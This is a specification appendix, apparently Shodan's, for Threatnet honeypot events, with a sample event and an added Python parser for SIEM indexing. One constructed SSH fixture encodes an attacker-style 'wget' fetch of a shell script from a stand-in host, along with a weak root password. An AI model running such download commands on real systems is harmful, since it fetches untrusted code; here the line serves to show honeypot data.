Appendix
Threatnet Event Specification
An event is emitted for every interaction picked up by a Threatnet sensor. It serializes the requests and responses of that interaction and adds information about the connecting host, such as where it is located. Properties under "Properties" are present on every event; those under "Optional Properties" appear only when the sensor collected them (for example, the ssh object is only present for interactions with an SSH sensor).
Properties
- src_ip
- [String] The IP address of the host as a string.
- src_port
- [Integer] The source port that the connecting host is sending data from.
- dst_port
- [Integer] The destination port number that the source host is connecting to.
- timestamp
- [String] The ISO 8601 timestamp for when the event was triggered on the sensor. Example: "2014-01-15T05:49:56.283713". The fractional-second precision and the presence of a trailing "Z" vary between events (the sample event below uses nanoseconds and a "Z" suffix), so parse the value with that in mind.
- shodan
- [Object] Contains information that describes the sensor, such as where it is located, whether it uses default configurations or is hosted in the cloud.
- shodan.location
- [Object] An object containing all of the location information for the sensor.
- shodan.tags
- [String[]] A list of tags that describe the type of sensor, for example "cloud" (the sensor is hosted at a cloud provider) or "backscatter" (as in the sample event below).
Optional Properties
- asn
- [String] The autonomous system number (ex. "AS4837").
- data
- [String] A base64-encoded string containing raw packet content.
- domains
- [String[]] An array of strings containing the top-level domains for the hostnames of the device, i.e. each hostname with its subdomain labels stripped. This is a utility property for filtering by domain instead of by full hostname. It correctly handles global TLDs that contain several dots (ex. "co.uk").
- hostnames
- [String[]] An array of strings containing all of the hostnames that have been assigned to the IP address for this device.
- ics
- [Object] An object containing information about the interaction performed on a sensor that is emulating an industrial control system.
- ics.request
- [String] The command/ request that was sent to the ICS sensor.
- ics.response
- [String] The response from the ICS sensor.
- ics.session
- [String] A unique session ID to identify the series of interactions a host has with the sensor.
- isp
- [String] The ISP that is providing the organization with the IP space for the source IP. Consider this the "parent" of the organization in terms of IP ownership.
- location
- [Object] An object containing all of the location information for the connecting host.
- location.area_code
- [Integer] The area code for the device's location. Only available for the US.
- location.city
- [String] The name of the city where the device is located.
- location.country_code
- [String] The 2-letter country code for the device location.
- location.country_code3
- [String] The 3-letter country code for the device location.
- location.country_name
- [String] The name of the country where the device is located.
- location.dma_code
- [Integer] The designated market area code for the area where the device is located. Only available for the US.
- location.latitude
- [Double] The latitude for the geolocation of the device.
- location.longitude
- [Double] The longitude for the geolocation of the device.
- location.postal_code
- [String] The postal code for the device's location.
- location.region_code
- [String] The code for the region (state or province) where the device is located, e.g. "NY" in the sample event below.
- org
- [String] The name of the organization that is assigned the IP space for the source IP.
- ssh
- [Object] An object containing properties that describe the interaction performed with the SSH sensor.
- ssh.password
- [String] The password used in the login attempt.
- ssh.session
- [String] A unique session ID to identify the series of interactions a host has with the sensor.
- ssh.type
- [String] The type of interaction that was performed, such as: NEW_CONNECTION, VALID_COMMAND, FILE_DOWNLOAD, CLOSED_CONNECTION etc.
- ssh.url
- [String] The URL of a file that the connecting host downloaded using a tool such as wget. Only present for download interactions.
- ssh.username
- [String] The username used in the login attempt.
Sample Event
The sample below also contains properties that the lists above do not document (proto, shodan.org, shodan.isp, location.time_zone, location.metro_code and location.continent). Treat undocumented properties as informational and subject to change; do not make parsing depend on them.
{
    "src_port": 77,
    "proto": "tcp",
    "timestamp": "2015-01-07T02:12:04.688228083Z",
    "isp": "China Telecom jiangsu",
    "src_ip": "222.186.56.177",
    "dst_port": 3128,
    "org": "China Telecom jiangsu province backbone",
    "shodan": {
        "org": "Digital Ocean",
        "isp": "Digital Ocean",
        "location": {
            "city": "New York",
            "region_code": "NY",
            "area_code": 212,
            "time_zone": "America/New_York",
            "dma_code": 501,
            "metro_code": "New York, NY",
            "country_code3": "USA",
            "latitude": 40.72139999999999,
            "postal_code": "10013",
            "longitude": -74.0052,
            "country_code": "US",
            "country_name": "United States",
            "continent": "NA"
        },
        "tags": [
            "cloud",
            "backscatter"
        ]
    },
    "asn": "AS23650",
    "location": {
        "city": "Nanjing",
        "region_code": "04",
        "area_code": 0,
        "time_zone": "Asia/Shanghai",
        "dma_code": 0,
        "metro_code": null,
        "country_code3": "CHN",
        "latitude": 32.0617,
        "postal_code": null,
        "longitude": 118.77780000000001,
        "country_code": "CN",
        "country_name": "China",
        "continent": "AS"
    }
}
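The following is an added example of consuming events in this format; it is not Shodan's own code. It checks that the required properties are present with the documented types, normalizes both timestamp shapes seen on this page (microseconds without a suffix, and nanoseconds with a trailing "Z", both assumed to be UTC), and flattens the event into a record suitable for indexing in a SIEM. The two sample events are constructed: the first mirrors the sample event above, the second is a made-up SSH honeypot interaction using the documented ssh.type value FILE_DOWNLOAD and documentation-range addresses.

```python
"""Consume Threatnet events: validate required properties, normalize the
timestamp and flatten the interaction into a SIEM-friendly record.
Added example; not Shodan's own code."""
import base64
import json
from datetime import datetime, timezone

# Required top-level properties and their JSON types, per the specification.
REQUIRED = {"src_ip": str, "src_port": int, "dst_port": int,
            "timestamp": str, "shodan": dict}


def parse_timestamp(ts):
    """Parse the sensor timestamp. The spec's example has microseconds and no
    zone suffix; the sample event has nanoseconds and a trailing 'Z'. Both are
    assumed to be UTC. The fraction is truncated or padded to six digits so
    datetime.fromisoformat() accepts it on every Python 3 release."""
    if ts.endswith("Z"):
        ts = ts[:-1]
    if "." in ts:
        base, frac = ts.split(".", 1)
        ts = f"{base}.{frac[:6].ljust(6, '0')}"
    return datetime.fromisoformat(ts).replace(tzinfo=timezone.utc)


def validate(event):
    """Return a list of problems; an empty list means the event carries every
    required property with the documented type and sane port values."""
    problems = []
    for key, typ in REQUIRED.items():
        value = event.get(key)
        # bool is a subclass of int in Python, so reject it explicitly.
        if value is None or not isinstance(value, typ) or isinstance(value, bool):
            problems.append(f"{key}: missing or not {typ.__name__}")
    for key in ("src_port", "dst_port"):
        value = event.get(key)
        if isinstance(value, int) and not 0 <= value <= 65535:
            problems.append(f"{key}: out of range ({value})")
    shodan = event.get("shodan")
    if isinstance(shodan, dict):
        if not isinstance(shodan.get("location"), dict):
            problems.append("shodan.location: missing or not an object")
        if not isinstance(shodan.get("tags"), list):
            problems.append("shodan.tags: missing or not a list")
    return problems


def classify(event):
    """Name the interaction type from the optional objects that are present."""
    if "ssh" in event:
        return "ssh"
    if "ics" in event:
        return "ics"
    if "data" in event:
        return "raw"
    return "connection"


def summarize(event):
    """Flatten a validated event into the fields an analyst would index.
    The attempted SSH password is deliberately left out of the summary."""
    problems = validate(event)
    if problems:
        raise ValueError("; ".join(problems))
    loc = event.get("location") or {}
    record = {
        "ts": parse_timestamp(event["timestamp"]).isoformat(),
        "src": f"{event['src_ip']}:{event['src_port']}",
        "dst_port": event["dst_port"],
        "kind": classify(event),
        "src_country": loc.get("country_code"),
        "asn": event.get("asn"),
        "org": event.get("org"),
        "sensor_tags": list(event["shodan"].get("tags", [])),
    }
    if "ssh" in event:
        ssh = event["ssh"]
        record.update(session=ssh.get("session"), ssh_type=ssh.get("type"),
                      username=ssh.get("username"), url=ssh.get("url"))
    elif "ics" in event:
        ics = event["ics"]
        record.update(session=ics.get("session"), request=ics.get("request"))
    if "data" in event:
        # data is base64-encoded raw packet content; keep only its length here.
        record["payload_bytes"] = len(base64.b64decode(event["data"]))
    return record


# Constructed sample events (not captured traffic). The first mirrors the
# specification's sample event; the second is a hypothetical SSH interaction.
BACKSCATTER_EVENT = json.loads("""{
  "src_ip": "222.186.56.177", "src_port": 77, "dst_port": 3128, "proto": "tcp",
  "timestamp": "2015-01-07T02:12:04.688228083Z", "asn": "AS23650",
  "org": "China Telecom jiangsu province backbone",
  "location": {"country_code": "CN", "city": "Nanjing"},
  "shodan": {"location": {"country_code": "US"}, "tags": ["cloud", "backscatter"]}
}""")

SSH_EVENT = {
    "src_ip": "198.51.100.23", "src_port": 51234, "dst_port": 22,
    "timestamp": "2014-01-15T05:49:56.283713", "asn": "AS64496",
    "shodan": {"location": {"country_code": "US"}, "tags": ["cloud"]},
    "ssh": {"session": "c0ffee01", "type": "FILE_DOWNLOAD", "username": "root",
            "password": "123456", "url": "http://203.0.113.9/x.sh"},
    "data": base64.b64encode(b"wget http://203.0.113.9/x.sh\n").decode(),
}

if __name__ == "__main__":
    for ev in (BACKSCATTER_EVENT, SSH_EVENT):
        print(json.dumps(summarize(ev), sort_keys=True))
```

Validation rejects an event with a non-integer or out-of-range port rather than silently coercing it, and the summary keeps the session ID from either the ssh or ics object so that the series of interactions from one host can be correlated downstream.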